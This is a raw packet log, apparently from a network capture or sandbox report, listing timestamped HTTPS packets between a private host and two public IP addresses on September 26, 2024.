                                      Sep 26, 2024 10:58:06.018986940 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.019073009 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.019104958 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.019157887 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.035137892 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.035155058 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.035332918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.035368919 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.035439014 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036017895 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036040068 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036098003 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036106110 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036150932 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036725044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036741972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036786079 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036792040 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036824942 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036850929 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037239075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037255049 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037305117 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037312031 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037338972 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037364960 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037833929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037851095 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037906885 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037914038 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037959099 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.057864904 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.057893038 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.058059931 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.058085918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.058131933 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106023073 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106053114 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106148958 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106183052 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106229067 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106540918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106559038 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106590986 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106606007 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106630087 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106652021 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.122528076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.122545004 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.122627020 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.122657061 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.122699022 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.123789072 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.123806000 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.123859882 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.123868942 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.123912096 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124403954 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124422073 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124469042 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124476910 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124517918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124888897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124906063 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124952078 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124959946 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124998093 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.125560999 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.125577927 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.125627995 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.125633955 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.125674963 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.145646095 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.145677090 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.145750999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.145775080 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.145832062 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.193569899 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.193602085 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.193711996 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.193737030 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.193790913 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.194001913 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.194021940 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.194072008 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.194078922 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.194118977 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.210258007 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.210290909 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.210355043 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.210375071 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.210413933 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.211195946 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.211280107 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.211316109 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.211323977 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.211352110 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.211374998 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.211877108 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.211905956 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.211945057 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.211951971 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.211987972 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.212011099 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.212387085 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.212410927 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.212441921 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.212446928 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.212476015 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.212500095 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.213013887 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.213042974 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.213083982 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.213090897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.213118076 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.213140965 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.233221054 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.233254910 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.233320951 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.233329058 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.233340979 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.233370066 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.281440020 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.281474113 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.281517029 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.281591892 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.281599998 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.281627893 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.281651020 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.284284115 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.379568100 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:06.379704952 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:06.379909039 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:06.380397081 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:06.380429029 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:06.843786955 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:06.843956947 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:06.863358021 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:06.863379002 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:06.863668919 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:06.864514112 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:06.907411098 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123692989 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123733044 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123785973 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123815060 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123833895 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.123859882 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123881102 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.123888969 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.123924971 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.123930931 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.157321930 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.157371044 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.157386065 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.157394886 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.157404900 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.157440901 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.204046965 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.204061031 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210582018 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210613966 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210644007 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210649014 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.210654974 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210685968 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210705042 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.210709095 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.210721970 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.211380959 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.211429119 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.211436987 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.211442947 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.211487055 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.211492062 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.211949110 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.211977959 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.211993933 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.211998940 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.212035894 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.243870020 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.243933916 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.243964911 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.243989944 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.244014025 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.244050026 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.244055033 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.244270086 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.244307041 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.244307995 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.244316101 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.244358063 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.244362116 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.290965080 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.291058064 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.291106939 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.297207117 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.297283888 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.297285080 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.297312021 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.297416925 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.297427893 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.297434092 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.297477961 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.298007011 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.298068047 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.298707962 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.298757076 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.298850060 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.298904896 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.299515963 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.299561024 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.299710989 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.299755096 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.300496101 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.300542116 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.300646067 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.300692081 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.330558062 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.330591917 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.330651045 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.330681086 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.330694914 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.330720901 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.331264973 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.331321001 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.331562042 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.331605911 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.332056046 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.332103968 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.370811939 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.370948076 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.377584934 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.377693892 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.384300947 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.384354115 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.384365082 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.384396076 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.384412050 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.384630919 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.384676933 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.384685993 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.384727001 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.384747028 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.384794950 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.385215044 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.385268927 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.385373116 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.385421038 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.386123896 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.386172056 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.386277914 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.386327028 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.386972904 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.387104034 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.387186050 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.387234926 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.387257099 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.387306929 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.387968063 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.388017893 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.388154984 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.388204098 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.388763905 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.388808966 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.417371035 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.417424917 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.417467117 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.417506933 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.417522907 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.417615891 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.417809963 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.417815924 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.417865992 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.417912960 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.417977095 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.418025017 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.418096066 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.418320894 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.418374062 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.418379068 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.418423891 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.418488026 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.418541908 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.418562889 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.418612003 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.418694019 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.418745041 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.419255018 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.419306040 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.419409037 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.419460058 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.457582951 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.457794905 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.470990896 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.471002102 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.471034050 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.471180916 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.471185923 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.471236944 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.471898079 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.471921921 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.471986055 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.471991062 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.472038031 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.472225904 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.472240925 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.472302914 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.472306967 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.472357035 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.473037004 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.473109961 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.473202944 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.473261118 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.473262072 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.473273039 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.473315954 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.473337889 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.473342896 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.504354000 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.504374981 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.504472971 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.504492998 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.504565001 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.504621029 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.504628897 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.505321980 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.505335093 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.505389929 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.505393982 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.547931910 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.551016092 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.551039934 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.551259995 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.551273108 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.551337004 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.557858944 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.557883024 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.557940006 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.557950020 CEST44349712188.114.97.3192.168.2.6
